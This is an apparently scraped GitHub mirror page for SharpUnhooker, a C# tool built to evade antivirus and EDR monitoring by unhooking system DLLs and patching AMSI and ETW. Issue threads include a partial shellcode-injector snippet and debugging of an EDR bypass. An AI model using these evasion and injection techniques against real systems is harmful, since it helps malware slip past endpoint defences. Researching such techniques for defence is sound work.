GithubHelp home page GithubHelp logo

sharpunhooker's Introduction

SharpUnhooker

C# Based Universal API Unhooker - Automatically Unhook API Hives (ntdll.dll, kernel32.dll, advapi32.dll, and kernelbase.dll). SharpUnhooker helps you to evades user-land monitoring done by AVs and/or EDRs by cleansing/refreshing API DLLs that loaded on the process (Offensive Side) or remove API hooks from user-land rootkit (Defensive Side). SharpUnhooker can unhook EAT hooks, IAT hooks, and JMP/Hot-patch/Inline hooks. SharpUnhooker also equipped with AMSI and ETW patcher to break/disable them.

This tool is tested on Windows 10 v21H2 x64

Note

  • If you want to copy the code, Please dont forget to credit me.
  • If you want to see a good demonstration of SharpUnhooker, go check this blog post by Reigada.
  • Github doesn't like my Sublime Text indentation settings, so if you see some "weirdness" on the indentation, Im sorry.

Usage

Simply load the pre-compiled DLL or add the code function and call the Main function from the SharpUnhooker class. You can load the pre-compiled DLL on Powershell with Reflection.Assembly too! This code uses C# 5,so it can be compiled with the built-in CSC from Windows 10. The JMPUnhooker function is used to unhook JMP/Hot-patch/Inline hooks, the EATUnhooker function is used to unhook EAT hooks, and the IATUnhooker function is used to unhook IAT hooks. For now, the IATUnhooker and EATUnhooker cant unhook function import/export that uses ordinals instead of name. The Main function is basically "wrapper" of all of the functionality of SharpUnhooker. If you want to test the capability of SharpUnhooker, you can use the UsageExample function from SUUsageExample class. Its just a simple local shellcode injector.

SharpUnhooker's Main function in action!

SharpUnhookerInAction

To-Do List

  • Add function ordinals ability on EATUnhooker and IATUnhooker
  • Add ability to remove hooks from CLRGuard

sharpunhooker's People

Contributors

getrektboy724 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar

sharpunhooker's Issues

EDR Test SylantStrike not bypassed?

Hey,
I'm trying to bypass the example https://github.com/CCob/SylantStrike .
The below is my code snipper using SharpUnhooker:

public class SUUsageExample{
.....
public static void Main()
    {
        SharpUnhooker.Mein();
        byte[] buf = new byte[285] { 0xfc,0x48,0x81,0xe4,0xf0,0....... }; // just message box
        run(buf);
    }

    public static void run(byte[] ShellcodeBytes)
    {
        SharpUnhooker.Mein();
        IntPtr ProcessHandle = new IntPtr(-1); // pseudo-handle for current process
        IntPtr ShellcodeBytesLength = new IntPtr(ShellcodeBytes.Length);
        IntPtr AllocationAddress = new IntPtr();
        IntPtr ZeroBitsThatZero = IntPtr.Zero;
        UInt32 AllocationTypeUsed = (UInt32)AllocationType.Commit | (UInt32)AllocationType.Reserve;
        Console.WriteLine("[*] Allocating memory...");
        NtAllocateVirtualMemory(ProcessHandle, ref AllocationAddress, ZeroBitsThatZero, ref ShellcodeBytesLength, AllocationTypeUsed, 0x04);
        Console.WriteLine("[*] Copying Shellcode...");
        Marshal.Copy(ShellcodeBytes, 0, AllocationAddress, ShellcodeBytes.Length);
        Console.WriteLine("[*] Changing memory protection setting...");
        UInt32 newProtect = 0;
        Sleep(1000);
        Console.WriteLine("[*] ...");
        NtProtectVirtualMemory(ProcessHandle, ref AllocationAddress, ref ShellcodeBytesLength, 0x40, ref newProtect);
        Console.WriteLine("[*] Passed...");

When hooking with SylantStrike on the process created with the above code, SylantStrike still detects the following call from NTDLL: NtProtectVirtualMemory(ProcessHandle, ref AllocationAddress, ref ShellcodeBytesLength, 0x40, ref newProtect);

This is the output when running the process:

ShellAnuuked.exe
[------------------------------------------]
[SharpUnhookerV4 - C# Based WinAPI Unhooker]
[         Written By GetRektBoy724         ]
[------------------------------------------]
[++++++++++++!SEQUENCE=STARTED!++++++++++++]
----------PHASE 1 == API UNHOOKING----------
[+++] NTDLL.DLL IS UNHOOKED!
[+++] NTDLL.DLL EXPORTS ARE CLEANSED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNEL32.DLL EXPORTS ARE CLEANSED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL EXPORTS ARE CLEANSED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL EXPORTS ARE CLEANSED!
------PHASE 2 == PATCHING AMSI AND ETW------
[*] !AMSI.DLL NOT DETECTED! [*]

[+++] !ETW PATCHED! [+++]
[+++++++++++!SEQUENCE==FINISHED!+++++++++++]
[------------------------------------------]
[SharpUnhookerV4 - C# Based WinAPI Unhooker]
[         Written By GetRektBoy724         ]
[------------------------------------------]
[++++++++++++!SEQUENCE=STARTED!++++++++++++]
----------PHASE 1 == API UNHOOKING----------
[+++] NTDLL.DLL IS UNHOOKED!
[+++] NTDLL.DLL EXPORTS ARE CLEANSED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNEL32.DLL EXPORTS ARE CLEANSED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL EXPORTS ARE CLEANSED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL EXPORTS ARE CLEANSED!
------PHASE 2 == PATCHING AMSI AND ETW------
[*] !AMSI.DLL NOT DETECTED! [*]

[+++] !ETW PATCHED! [+++]
[+++++++++++!SEQUENCE==FINISHED!+++++++++++]
[*] Allocating memory...
[*] Copying Shellcode...
[*] Changing memory protection setting...
[*] ...

This is SylantStrike output:

SylantStrikeInject.exe --dll=SylantStrike.dll --process=ShellAnuuked.exe
Waiting for process events
+ Listening for the following processes: shellanuuked.exe

 Injecting process ShellAnuuked.exe(10520) with DLL SylantStrike.dll

Shouldn't NTDLL be unhooked by the time NtProtectVirtualMemory(ProcessHandle, ref AllocationAddress, ref ShellcodeBytesLength, 0x40, ref newProtect); is called?

System.AccessViolationException

With GameGuard:

[+++] NTDLL.DLL IS UNHOOKED!
[+++] NTDLL.DLL EXPORTS ARE CLEANSED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNEL32.DLL EXPORTS ARE CLEANSED!
[+++] KERNEL32.DLL IMPORTS ARE CLEANSED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL EXPORTS ARE CLEANSED!
Fatal error. System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
at System.SpanHelpers.IndexOf(Byte ByRef, Byte, Int32)
at System.String.Ctor(SByte*)
at System.Runtime.InteropServices.Marshal.PtrToStringAnsi(IntPtr)
at SharpUnhooker.IATUnhooker(System.String)
at SharpUnhooker.Main()

Access Violation with JMP unhooking.

I get an Access Violation when attempting to write the original dll bytes back over to the section in memory:
Marshal.Copy(originalTextSectionBytes, 0, moduleTextSectionAddress, originalTextSectionBytes.Length);

Above that, we try and set the protection of this section to writeable. We set the new protection to 0x40 (PAGE_EXECUTE_READWRITE) and the old one is 0x20 (PAGE_EXECUTE_READ). However, when I query the protection of that section again, it comes back as 0x80 (PAGE_EXECUTE_WRITECOPY). Per this article, that seems correct as this section is a memory-mapped file. In theory, writes to this section should create a copy of it that is used in this process. However, I'm not sure if that's what's causing the AV and a crash.

Anyone else seeing this?

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.